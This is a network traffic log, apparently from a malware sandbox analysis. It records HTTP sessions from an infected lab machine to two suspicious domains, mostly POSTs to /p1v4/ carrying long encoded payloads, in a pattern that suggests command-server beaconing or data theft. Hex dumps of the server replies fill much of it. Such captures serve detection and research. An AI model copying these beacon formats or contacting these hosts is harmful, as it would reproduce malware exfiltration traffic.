                                                                                                                                                                                                                                                              Content-Encoding: gzip
                                                                                                                                                                                                                                                              Data Raw: 36 63 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ad 58 7f 6f e3 b8 11 fd df 9f 62 a2 02 89 0d 58 52 9c bd dd 4d 1c 59 c5 75 37 05 02 6c 71 db db 2c da c5 61 11 50 e4 c8 e2 85 22 55 92 b2 62 a4 f9 ee 05 45 c9 96 7f 24 d7 45 0b 04 88 28 0e df cc 3c be 19 91 4e 4e 3e fe f2 e1 ee db e7 1b 28 6c 29 d2 51 72 12 86 bf f1 1c 84 85 db 1b 78 ff 3d 85 c4 4d 00 15 c4 98 45 20 55 f8 bb 01 8e ef 40 09 c6 31 00 41 e4 72 11 a0 0c bf 7e 09 52 48 4e 7e 43 c9 78 fe 3d 0c b7 50 1d 0e c0 71 a8 f7 3f 06 75 f9 0a d4 e5 0f 40 2d 6d 87 e6 5e 1c cb f2 10 25 0c 77 91 0a 24 2c 1d 25 96 5b 81 e9 cf d6 a2 b4 5c 49 f8 15 ff 55 73 8d ec 04 fe 0d 1f 84 aa 59 2e 88 c6 24 f6 76 a3 a4 44 4b 80 16 44 1b b4 8b e0 eb dd 5f c3 cb 00 e2 7e a2 b0 b6 0a 1d c2 6a 11 7c 50 d2 81 86 77 eb 0a 03 a0 7e b4 08 2c 3e da d8 c5 7b bd 81 79 0d e5 9f e1 d7 9f c3 0f aa ac 88 e5 99 18 02 dd de 2c 6e d8 12 07 eb 24 29 71 11 68 95 29 6b 06 86 52 71 c9 f0 71 0a 52 e5 4a 08 d5 1c 2c 59 71 6c 2a a5 ed 60 51 c3 99 2d 16 0c 57 9c 62 d8 0e a6 5c 72 cb 89 08 0d 25 02 [TRUNCATED]
                                                                                                                                                                                                                                                              Data Ascii: 6ceXobXRMYu7lq,aP"UbE$E(<NN>(l)Qrx=ME U@1Ar~RHN~Cx=Pq?u@-m^%w$,%[\IUsY.$vDKD_~j|Pw~,>{y,n$)qh)kRqqRJ,Yql*`Q-Wb\r%3"|bhDgUH/2%TLVDQ..8:/gchWa)~*^r9?c\.JG7;48J0>d*Q8Hdxhdc7+7%_)"ZV~5h,)Z(mD{#=e}g&$=\wQWY2
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:01.599123001 CEST1184INData Raw: a1 e8 c3 99 b7 7b 9e 8c 00 9e 47 49 dc a7 76 50 45 a3 51 12 77 85 e4 b8 73 c9 27 8c af ba fd 0f 1b 4d aa 0a 75 90 b6 70 ed 4c 57 a4 34 f7 21 41 ff 10 b6 1b e4 86 5d c4 ed b8 53 d2 20 87 00 18 b1 24 b4 9a 48 23 88 45 57 e2 8e d8 7b 6f 64 82 f4 b3
                                                                                                                                                                                                                                                              Data Ascii: {GIvPEQws'MupLW4!A]S $H#EW{od@b.S%1A]%\D3A*<ZvY {XpAEiZPB(5Blv1$1jUR4&HF3`$v)PB8%eFZ.VG2B
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:01.599147081 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              57192.168.11.2049806172.67.191.24180
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:04.106813908 CEST556OUTGET /fp5q/?9B6h=hTm9ypMPCvkZHpXOUIowtI5N2+z4niygtjCFVe/8mioZPRfz5TFJ3IewZaR+NPU03UUaFdubUQ2FIRqoOOixztWDEcr2XGgHHm20+kxsPtJkRiaVsamec0k=&FlS=3ldH5dkH-dBLf HTTP/1.1
                                                                                                                                                                                                                                                              Host: www.cachsoicautdtc.best
                                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:04.213773966 CEST1289INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                              Date: Wed, 09 Oct 2024 11:43:04 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                              Referrer-Policy: same-origin
                                                                                                                                                                                                                                                              Cache-Control: max-age=15
                                                                                                                                                                                                                                                              Expires: Wed, 09 Oct 2024 11:43:19 GMT
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=C3EcsDOe8LfYujcZ7b7XA9%2FHRmA6HkYKONCTgfG2sKuEpFT4gubH2Y%2B6JF57QmPKBaLrqTxADnq4tk9OSEDVzDYRBDK6WBItVE3O2rHxiNG96dBUAEn22fXVVqk4poOgJlW3LK38HX3%2BQw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Speculation-Rules: "/cdn-cgi/speculation"
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8cfe1c62fb7a726f-EWR
                                                                                                                                                                                                                                                              Data Raw: 31 31 61 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 [TRUNCATED]
                                                                                                                                                                                                                                                              Data Ascii: 11ab<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Attention Required! | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><me
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:04.213865995 CEST1289INData Raw: 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c
                                                                                                                                                                                                                                                              Data Ascii: ta name="viewport" content="width=device-width,initial-scale=1" /><link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" />...[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:04.213880062 CEST1289INData Raw: 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20
                                                                                                                                                                                                                                                              Data Ascii: <span class="cf-no-screenshot error"></span> </div> </div> </div>... /.captcha-container --> <div class="cf-section cf-wrapper"> <div class="cf-columns two"> <div class="cf-colum
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:04.213892937 CEST1289INData Raw: 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49
                                                                                                                                                                                                                                                              Data Ascii: lass="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8cfe1c62fb7a726f</strong></span> <span class="cf-footer-separator sm:hidden">&bull;</span> <span id="cf-footer-item-ip"
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:04.213901043 CEST83INData Raw: 20 2d 2d 3e 0a 0a 20 20 3c 73 63 72 69 70 74 3e 0a 20 20 77 69 6e 64 6f 77 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d
                                                                                                                                                                                                                                                              Data Ascii: --> <script> window._cf_translation = {}; </script></body></html>
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:04.213910103 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              58192.168.11.2049807104.21.50.20280
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:09.327955961 CEST829OUTPOST /p1v4/ HTTP/1.1
                                                                                                                                                                                                                                                              Host: www.itemfilterhub.shop
                                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                                                                                                              Origin: http://www.itemfilterhub.shop
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Content-Length: 201
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Referer: http://www.itemfilterhub.shop/p1v4/
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                                                                                                                                                                                                                              Data Raw: 39 42 36 68 3d 61 55 66 50 66 54 68 39 4b 36 6c 49 34 79 58 63 43 43 36 43 46 6a 6c 33 79 42 2b 62 4c 31 71 66 4d 6c 59 6e 4a 72 37 6b 6c 31 4d 47 76 5a 6f 2f 4b 7a 33 62 4e 73 6d 6b 36 6c 43 33 70 2f 4c 74 41 54 69 46 73 38 4d 6b 73 4b 7a 58 72 77 67 56 58 61 48 50 34 32 45 58 4e 5a 6d 48 34 4e 2f 7a 31 53 55 70 52 41 75 4e 65 69 6a 75 67 6c 37 42 58 6b 79 64 59 57 73 4a 72 46 46 7a 64 64 54 30 42 59 7a 66 4b 2f 47 63 53 70 36 4e 72 64 66 5a 73 4f 31 2b 4a 67 65 6a 2f 6f 72 4f 62 32 57 44 32 2f 55 31 7a 30 56 6a 64 53 51 4e 63 32 45 78 75 38 39 46 75 2f 62 59 48 65 53 58 36 78 4b 64 77 41 3d 3d
                                                                                                                                                                                                                                                              Data Ascii: 9B6h=aUfPfTh9K6lI4yXcCC6CFjl3yB+bL1qfMlYnJr7kl1MGvZo/Kz3bNsmk6lC3p/LtATiFs8MksKzXrwgVXaHP42EXNZmH4N/z1SUpRAuNeijugl7BXkydYWsJrFFzddT0BYzfK/GcSp6NrdfZsO1+Jgej/orOb2WD2/U1z0VjdSQNc2Exu89Fu/bYHeSX6xKdwA==
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:09.933917999 CEST731INHTTP/1.1 404
                                                                                                                                                                                                                                                              Date: Wed, 09 Oct 2024 11:43:09 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html;charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=p42idD7topIpz1%2F2WuAL2Jy%2BpAa4sSnANJpNEuga%2FZlfU0AiND8FX9fQ4wUNo4sIx3fjysOxF4UT%2BJoAb64ZBrLh3KZcmmrscSsKVtoERV1q%2F0vStCvpUoIWPDnDixOPD0cUW8rGWaBs"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8cfe1c83995a7c82-EWR
                                                                                                                                                                                                                                                              Content-Encoding: gzip
                                                                                                                                                                                                                                                              Data Raw: 37 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 5c 8e 41 0a c3 30 10 03 ef 7e 45 c8 03 b2 31 69 6f ea 1e fb 8f 3a 5e b2 06 c7 06 b3 d0 f6 f7 25 69 02 a5 27 81 34 42 82 da 9a d9 41 e5 11 19 96 2c 0b 5f c6 a9 bb d7 16 52 8c 52 40 5f 13 b4 23 0e a1 c6 77 17 96 b9 e6 da 6e fd 53 93 49 cf 0e b3 14 93 c6 50 ff df 57 cf a0 23 76 d0 c6 27 5b 96 54 5e e4 07 7f 1d c6 1f 82 b6 85 4d f7 6b 1f 00 00 00 ff ff 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 7f\A0~E1io:^%i'4BA,_RR@_#wnSIPW#v'[T^Mk
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:09.933929920 CEST20INData Raw: 61 0d 0a 03 00 96 12 38 3e a1 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: a8>0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              59192.168.11.2049808104.21.50.20280
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:11.950274944 CEST849OUTPOST /p1v4/ HTTP/1.1
                                                                                                                                                                                                                                                              Host: www.itemfilterhub.shop
                                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                                                                                                              Origin: http://www.itemfilterhub.shop
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Content-Length: 221
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Referer: http://www.itemfilterhub.shop/p1v4/
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                                                                                                                                                                                                                              Data Raw: 39 42 36 68 3d 61 55 66 50 66 54 68 39 4b 36 6c 49 34 53 48 63 41 6a 36 43 48 44 6c 30 2b 68 2b 62 42 56 71 62 4d 6c 45 6e 4a 75 58 30 6c 44 63 47 73 38 4d 2f 4a 79 33 62 45 38 6d 6b 78 46 43 79 30 76 4c 69 41 54 75 33 73 39 77 6b 73 4a 50 58 72 78 77 56 58 70 76 4d 35 6d 45 56 42 35 6d 4a 6c 64 2f 7a 31 53 55 70 52 42 4c 57 65 69 72 75 68 56 4c 42 57 47 4b 65 62 57 73 4b 2f 56 46 7a 4c 64 54 34 42 59 79 49 4b 36 76 35 53 76 2b 4e 72 66 48 5a 74 66 31 39 51 51 65 6c 67 34 71 78 57 58 58 6e 7a 39 63 2b 33 6d 5a 4b 54 48 6f 58 64 67 56 72 7a 4f 4a 68 74 73 48 71 44 75 72 2f 34 7a 4c 47 74 47 51 45 70 6b 52 44 44 69 56 44 44 4e 6f 35 6b 66 45 76 75 65 73 3d
                                                                                                                                                                                                                                                              Data Ascii: 9B6h=aUfPfTh9K6lI4SHcAj6CHDl0+h+bBVqbMlEnJuX0lDcGs8M/Jy3bE8mkxFCy0vLiATu3s9wksJPXrxwVXpvM5mEVB5mJld/z1SUpRBLWeiruhVLBWGKebWsK/VFzLdT4BYyIK6v5Sv+NrfHZtf19QQelg4qxWXXnz9c+3mZKTHoXdgVrzOJhtsHqDur/4zLGtGQEpkRDDiVDDNo5kfEvues=
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:12.194515944 CEST737INHTTP/1.1 404
                                                                                                                                                                                                                                                              Date: Wed, 09 Oct 2024 11:43:12 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html;charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GSaHBohponHT5UXBdSqMBYZLHu%2BZiE1%2FA0q6tWv1kOkk%2B9JycWFmZCx6G0M78ntfE11spqnQm3JBdqS4%2BCaz%2ByKkgwlZRdEJ%2F%2Bp2wciQ%2F4mw1ErWl996KBs6Bn4xx0LuoLObF0FFQzC2"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8cfe1c93fe7c5e66-EWR
                                                                                                                                                                                                                                                              Content-Encoding: gzip
                                                                                                                                                                                                                                                              Data Raw: 37 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 5c 8e 41 0a c3 30 10 03 ef 7e 45 c8 03 b2 31 69 6f ea 1e fb 8f 3a 5e b2 06 c7 06 b3 d0 f6 f7 25 69 02 a5 27 81 34 42 82 da 9a d9 41 e5 11 19 96 2c 0b 5f c6 a9 bb d7 16 52 8c 52 40 5f 13 b4 23 0e a1 c6 77 17 96 b9 e6 da 6e fd 53 93 49 cf 0e b3 14 93 c6 50 ff df 57 cf a0 23 76 d0 c6 27 5b 96 54 5e e4 07 7f 1d c6 1f 82 b6 85 4d f7 6b 1f 00 00 00 ff ff 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 7f\A0~E1io:^%i'4BA,_RR@_#wnSIPW#v'[T^Mk
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:12.194605112 CEST15INData Raw: 61 0d 0a 03 00 96 12 38 3e a1 00 00 00 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: a8>
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:12.194617033 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              60192.168.11.2049809104.21.50.20280
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:14.575975895 CEST2578OUTPOST /p1v4/ HTTP/1.1
                                                                                                                                                                                                                                                              Host: www.itemfilterhub.shop
                                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                                                                                                              Origin: http://www.itemfilterhub.shop
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Content-Length: 7369
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Referer: http://www.itemfilterhub.shop/p1v4/
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                                                                                                                                                                                                                              Data Raw: 39 42 36 68 3d 61 55 66 50 66 54 68 39 4b 36 6c 49 34 53 48 63 41 6a 36 43 48 44 6c 30 2b 68 2b 62 42 56 71 62 4d 6c 45 6e 4a 75 58 30 6c 44 55 47 73 4b 41 2f 4c 52 66 62 65 38 6d 6b 2b 56 43 7a 30 76 4c 37 41 51 65 7a 73 39 38 65 73 50 4c 58 71 57 77 56 41 6f 76 4d 77 6d 45 56 4a 5a 6d 49 34 4e 2b 78 31 53 45 74 52 42 62 57 65 69 72 75 68 58 54 42 57 55 79 65 64 57 73 4a 72 46 46 2f 64 64 53 74 42 65 62 39 4b 36 6a 48 53 66 65 4e 72 2f 58 5a 68 4e 64 39 50 67 65 6e 68 34 71 70 57 53 50 34 7a 39 77 49 33 6e 74 67 54 41 30 58 66 55 59 49 75 39 6c 41 78 73 36 6d 4a 75 37 38 2b 41 4c 58 67 58 6b 72 76 53 42 70 4e 33 70 42 45 66 34 4d 30 4e 31 75 33 70 57 56 58 34 73 75 39 51 76 31 4b 5a 58 52 6c 59 59 31 69 45 2f 61 42 31 35 39 41 4b 34 76 55 79 35 66 67 41 7a 6b 2f 7a 65 6b 45 76 46 66 71 2b 50 69 44 43 51 5a 6b 55 45 6c 34 56 75 73 37 42 47 76 77 48 34 63 6e 54 76 65 36 51 4e 4a 6f 6c 38 6a 64 4d 38 64 34 51 4a 57 64 54 39 41 4d 6b 67 6b 72 4d 6a 73 33 39 64 4c 75 45 6f 45 64 4c 6a 4d 67 33 51 49 6d [TRUNCATED]
                                                                                                                                                                                                                                                              Data Ascii: 9B6h=aUfPfTh9K6lI4SHcAj6CHDl0+h+bBVqbMlEnJuX0lDUGsKA/LRfbe8mk+VCz0vL7AQezs98esPLXqWwVAovMwmEVJZmI4N+x1SEtRBbWeiruhXTBWUyedWsJrFF/ddStBeb9K6jHSfeNr/XZhNd9Pgenh4qpWSP4z9wI3ntgTA0XfUYIu9lAxs6mJu78+ALXgXkrvSBpN3pBEf4M0N1u3pWVX4su9Qv1KZXRlYY1iE/aB159AK4vUy5fgAzk/zekEvFfq+PiDCQZkUEl4Vus7BGvwH4cnTve6QNJol8jdM8d4QJWdT9AMkgkrMjs39dLuEoEdLjMg3QImKhNBejpR6TN5XgGv8i1o3IzhYaBDJE5hdDZh8pqCglO74PcVF/Y2EECTfPHa3fHBvL7ncBiTMr8/EB3ZaFdBWD+tFMcZmRyLgP4x2xp6fmngiuiirxIzx6IXi+4/3Q7pdKU8LmzehxoxVlUYWPaoL2TjiZyIFQ09VOES3I9WgCgi8TNsixjP8aR2Y4OV2Yf+RrJ0+NwNgwrcc7Ey5kTLWt4b0memnKUAu4ldd7DiULOjukUtRombNoUoR0yQkI4z+cpLgauaKd0/R7IYVuRO+eIu7GtLMBb5zbLW9Qqhakak6g6VIhJZdAO29guy8c9dAqYAfbjdsxEdjIUD2Mdra7FKu8BtD7oEPbnkm73mluX9D5AceteHwtMYxAbFocFcMVZ330/F2oabIvpUa91V472VHqtiRWHaHlGAKbJmwpEwLQWjwCXXsRwA1fDwyBEPuowjiWWUe8AngsHC6sZ17RjdLXDCUFE2gciN+ILQB6AmlrKpkUBC4QPYIc9jskYkPdE3cYWFOpXRYeWFUZN6oephpUkVKwSlbmws3eqt12WIfX6EJ4C9gNg5ZyQHKs7h1w1yGQ8BKw1VfLQX4+jOQLZUR2FUrZFq8BRnHlRn/NhUZ4q2grhlP9jlQGjVq8hvt5a+MqbJr/ZiMRt+knJ6lN6ck2QMbYC2kx [TRUNCATED]
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:14.575999022 CEST3867OUTData Raw: 39 57 45 7a 39 43 49 74 33 63 59 46 50 74 41 78 63 68 5a 63 66 78 69 39 53 34 75 38 4a 71 59 2b 6b 66 65 30 78 34 4a 75 77 38 54 51 4f 55 48 74 59 46 51 30 58 35 45 72 4e 67 45 71 73 37 5a 37 35 70 34 43 6c 42 4b 71 4f 4c 55 53 78 71 35 58 6c 49
                                                                                                                                                                                                                                                              Data Ascii: 9WEz9CIt3cYFPtAxchZcfxi9S4u8JqY+kfe0x4Juw8TQOUHtYFQ0X5ErNgEqs7Z75p4ClBKqOLUSxq5XlISBwqe7APtpyqI9EkmvjsnME2yRVAtMH5YClhVPVkWtNLNaLR2M/yqU35wdYihPNmbHjuRR4l4o+RZ02EweIm+9W8CXvRgl6knhzO1V1o50iEumshQwtN/E+ftpOyQSXhmYwTV2XW1Qw9ZLJ5kWtrk1XEhgt+iFzVb
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:14.576071978 CEST1553OUTData Raw: 45 37 47 6c 61 33 4d 65 70 76 46 59 7a 57 7a 48 48 61 53 69 32 42 51 35 56 30 6f 73 73 72 4d 6d 37 37 35 34 74 46 70 46 58 46 6f 66 75 6d 4d 6a 7a 49 38 77 4c 69 68 71 54 39 39 6e 31 4a 71 4f 45 34 62 76 52 6a 6e 52 52 75 6d 42 65 55 47 68 2f 46
                                                                                                                                                                                                                                                              Data Ascii: E7Gla3MepvFYzWzHHaSi2BQ5V0ossrMm7754tFpFXFofumMjzI8wLihqT99n1JqOE4bvRjnRRumBeUGh/FFsMQjhBrmIP0VXTGSBU5MbSjn0Cem3VOPw/5aaWpIGBd1IrqFB1zXuRbMnr6npMKRWF7KusEXZIIROZFT0kbIdvsfb8de/nkpRn+rNDd0qsAzRDT7pY6FV4xs25/INXsdK2fT9+aPP+clBHUoKZ2VLeozjSebJcjB
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:15.028693914 CEST739INHTTP/1.1 404
                                                                                                                                                                                                                                                              Date: Wed, 09 Oct 2024 11:43:14 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html;charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xuogQ9Cz4XqUV8e%2BGiZ0xqIyI7Gvq1%2Fz38CZlIlTw%2F2QXRU7QHsVqtGoUezq1cfZ1jiPowzkJsNOrMXRcJitqRWJVj3GPxYZRibkzevT9K8GRcyD1MYis1B3eEG5J4BlBwMFMsJt%2B2Cd"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8cfe1ca46efa4213-EWR
                                                                                                                                                                                                                                                              Content-Encoding: gzip
